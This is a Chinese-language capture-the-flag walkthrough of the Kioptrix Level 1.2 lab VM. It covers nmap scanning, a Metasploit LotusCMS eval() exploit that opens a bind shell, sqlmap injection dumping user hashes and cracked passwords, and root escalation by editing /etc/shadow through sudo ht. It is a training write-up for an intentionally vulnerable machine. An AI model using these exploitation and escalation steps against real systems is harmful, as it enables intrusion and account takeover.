Kioptrix: Level 1.2
主机发现端口扫描
使用nmap扫描网段类存活主机
因为靶机是我最后添加的,所以靶机IP是
169
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15nmap -sP 192.168.75.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-29 13:16 CST
Nmap scan report for 192.168.75.1
Host is up (0.00031s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.75.2
Host is up (0.00029s latency).
MAC Address: 00:50:56:FB:CA:45 (VMware)
Nmap scan report for 192.168.75.169
Host is up (0.00052s latency).
MAC Address: 00:0C:29:D1:B8:48 (VMware)
Nmap scan report for 192.168.75.254
Host is up (0.00021s latency).
MAC Address: 00:50:56:EC:C5:A4 (VMware)
Nmap scan report for 192.168.75.151扫描主机开放端口
1
2
3
4
5
6
7
8
9nmap -sT -min-rate 10000 -p- 192.168.75.169
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-29 13:16 CST
Nmap scan report for 192.168.75.169
Host is up (0.0010s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:D1:B8:48 (VMware)扫描主机服务版本以及系统版本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16nmap -sV -sT -O -p22,80 192.168.75.169
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-29 13:19 CST
Nmap scan report for 192.168.75.169
Host is up (0.00044s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:D1:B8:48 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel扫描漏洞
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82nmap -script=vuln -p22,80 192.168.75.169
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-29 13:20 CST
Stats: 0:02:22 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.52% done; ETC: 13:22 (0:00:02 remaining)
Stats: 0:02:53 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.52% done; ETC: 13:23 (0:00:02 remaining)
Nmap scan report for 192.168.75.169
Host is up (0.00027s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.75.169:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
| http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.75.169:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
|_ http://192.168.75.169:80/index.php?page=index%27%20OR%20sqlspider
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-trace: TRACE is enabled
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.169
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.75.169:80/gallery/
| Form id:
| Form action: login.php
|
| Path: http://192.168.75.169:80/index.php?system=Admin
| Form id: contactform
| Form action: index.php?system=Admin&page=loginSubmit
|
| Path: http://192.168.75.169:80/gallery/gadmin/
| Form id: username
| Form action: index.php?task=signin
|
| Path: http://192.168.75.169:80/gallery/index.php
| Form id:
| Form action: login.php
|
| Path: http://192.168.75.169:80/index.php?system=Blog&post=1281005380
| Form id: commentform
| Form action:
|
| Path: http://192.168.75.169:80/index.php?system=Admin&page=loginSubmit
| Form id: contactform
|_ Form action: index.php?system=Admin&page=loginSubmit
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /phpmyadmin/: phpMyAdmin
| /cache/: Potentially interesting folder
| /core/: Potentially interesting folder
| /icons/: Potentially interesting folder w/ directory listing
| /modules/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_ /style/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:D1:B8:48 (VMware)
WEB渗透
访问主页
扫描目录
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16dirsearch -u 192.168.75.169 -x 403
//
[13:31:06] Starting:
[13:31:27] 301 - 355B - /cache -> http://192.168.75.169/cache/
[13:31:31] 301 - 354B - /core -> http://192.168.75.169/core/
[13:31:31] 200 - 688B - /core/fragments/moduleInfo.phtml
[13:31:36] 200 - 23KB - /favicon.ico
[13:31:37] 301 - 357B - /gallery -> http://192.168.75.169/gallery/
[13:31:47] 301 - 357B - /modules -> http://192.168.75.169/modules/
[13:31:47] 200 - 2KB - /modules/
[13:31:52] 301 - 360B - /phpmyadmin -> http://192.168.75.169/phpmyadmin/
[13:31:53] 401 - 520B - /phpmyadmin/scripts/setup.php
[13:31:53] 200 - 8KB - /phpmyadmin/
[13:31:53] 200 - 8KB - /phpmyadmin/index.php
[13:32:03] 301 - 355B - /style -> http://192.168.75.169/style/
[13:32:08] 200 - 18B - /update.php/modules
像是文件服务器/phpmyadmin
phpmyadmin/update.php
提示permission denied.
index.php?system=Admin
是登陆页面
登陆页面发现是CMS是
LotusCMS
查阅有没有可以利用漏洞看见
ruby
后缀利用文件,上msf
搜索看看1
2
3
4
5
6
7
8# searchsploit LotusCMS
//
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit) | php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities | php/webapps/16982.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------进入
msf
控制台,进行搜索,应该就是searchsploit
搜索出来的那个1
2
3
4
5
6
7
8msf6 > search LotusCMS
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/lcms_php_exec 2011-03-03 excellent Yes LotusCMS 3.0 eval() Remote Command Execution尝试利用
1
2
3
4
5
6
7
8
9
10msf6 > use exploit/multi/http/lcms_php_exec
msf6 exploit(multi/http/lcms_php_exec) > set rhosts 192.168.75.169
rhosts => 192.168.75.169
msf6 exploit(multi/http/lcms_php_exec) > set uri /index.php?system=Admin
uri => /index.php?system=Admin
msf6 exploit(multi/http/lcms_php_exec) > run
[*] Started reverse TCP handler on 192.168.75.151:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Exploit completed, but no session was created.死活不成功,尝试换一下
payload
1
2msf6 exploit(multi/http/lcms_php_exec) > set payload php/reverse_php
payload => php/reverse_php尝试了几个
payload
后发现php/bind_perl
可以使用1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18msf6 exploit(multi/http/lcms_php_exec) > set payload php/reverse_perl
payload => php/reverse_perl
msf6 exploit(multi/http/lcms_php_exec) > run
[*] Started reverse TCP handler on 192.168.75.151:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/lcms_php_exec) > set payload php/bind_perl
payload => php/bind_perl
msf6 exploit(multi/http/lcms_php_exec) > run
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Started bind TCP handler against 192.168.75.169:4444
[*] Command shell session 1 opened (192.168.75.151:34319 -> 192.168.75.169:4444) at 2024-10-29 14:08:36 +0800
whoami
www-data
提权
查看权限
1
2
3
4
5
6
7
8
9
10python -c "import pty;pty.spawn('/bin/sh')"
//
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
//
$ uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
//
$ whoami
www-data寻找突破口
suid提权寻找
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/apache2/suexec
/usr/lib/pt_chown
/usr/bin/arping
/usr/bin/mtr
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/at
/usr/bin/sudoedit
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/local/bin/ht
/usr/sbin/pppd
/usr/sbin/uuidd
/lib/dhcp3-client/call-dhclient-script
/bin/fusermount
/bin/ping
/bin/mount
/bin/umount
/bin/ping6
/bin/su/etc/phpmyadmin
下config.inc.php
存在数据库账号密码,尝试但是登陆失败1
2// $cfg['Servers'][$i]['controluser'] = 'pma';
// $cfg['Servers'][$i]['controlpass'] = 'pmapass';寻找敏感文件,在
/home/loneferret
存在一个CompanyPolicy.README
文件1
2
3
4
5
6
7
8# CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO但是
sudo ht
需要密码,继续寻找别的方法
web渗透 2
才知道我的靶机有问题,访问
gallery/
会加载不完全,被浏览器自动拦截了很多内容。取消拦截后就好了
发现
http://kioptrix3.com/gallery/gallery.php?id=1
有个可能存在sql注入的地方,使用sqlmap
检测是否存在sql注入1
2
3
4
5
6
7
8# 结果
[19:07:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8, PHP
back-end DBMS: MySQL >= 5.0.12
[19:07:05] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 23 times
[19:07:05] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/kioptrix3.com'存在sql注入,继续使用
sqlmap
来爆破剩余的数据最后
dump
下两行数据,是两个用户1
2
3
4
5
6+----+---------------------------------------------+------------+
| id | password | username |
+----+---------------------------------------------+------------+
| 1 | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) | dreg |
| 2 | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
+----+---------------------------------------------+------------+使用爆破出来的用户去尝试登陆 ssh,
loneferret
成功登入
提权 2
查看权限
1
2
3
4loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/htht
拥有sudo
权限,根据之前发现的内容知道ht可以编辑文件,并且拥有sudo
权限尝试修改
shadow
文件1
2loneferret@Kioptrix3:~$ sudo ht /etc/shadow
Error opening terminal: xterm-256color.报错了:
Error opening terminal: xterm-256color.
,需要加上1
export TERM=xterm
直接将当前用户的密码覆盖到
root
上去,F3
好像是编辑,F2
保存,ctrl + c
退出然后
ssh
登录root
账户,提权成功1
2
3loneferret@Kioptrix3:~$ su root
Password:
root@Kioptrix3:/home/loneferret#读取flag文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44root@Kioptrix3:~# cat Congrats.txt
//
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.
Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.
The object is to learn, do some research and have a little (legal)
fun in the process.
I hope you enjoyed this third challenge.
Steven McElrea
aka loneferret
http://www.kioptrix.com
Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.
Main page CMS:
http://www.lotuscms.org
Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/
The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/
Also, all pictures were taken from Google Images, so being part of the
public domain I used them.
root@Kioptrix3:~#